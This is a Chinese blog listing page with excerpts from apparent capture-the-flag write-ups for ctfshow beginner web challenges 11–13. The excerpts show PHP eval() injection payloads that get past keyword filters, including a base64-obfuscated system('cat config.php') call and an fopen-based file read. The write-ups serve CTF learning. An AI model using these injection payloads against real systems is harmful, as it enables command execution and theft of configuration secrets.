摘要:
ctfshow web13 萌新 直接copy大佬wp 总结精炼 这次的过滤中增加了分号这样我们就只能执行一条语句了,在eval()中的是php语句,分号禁了,我们只能用 ?>来闭合语句了,这里再提下assert()assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适 阅读全文
摘要:
ctf show 萌新web12 文件名也被过滤掉 base64绕过 构造paylaod ?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b); 得到flag 或者是 对于反引号 在Linux中 阅读全文
摘要:
ctfshow 萌新web11 又增加了cat的绕过 这个payload依然可用 ?c=$file_handle = fopen("config.php","r");if ($file_handle){while (!feof($file_handle)) { $line = fgets($file 阅读全文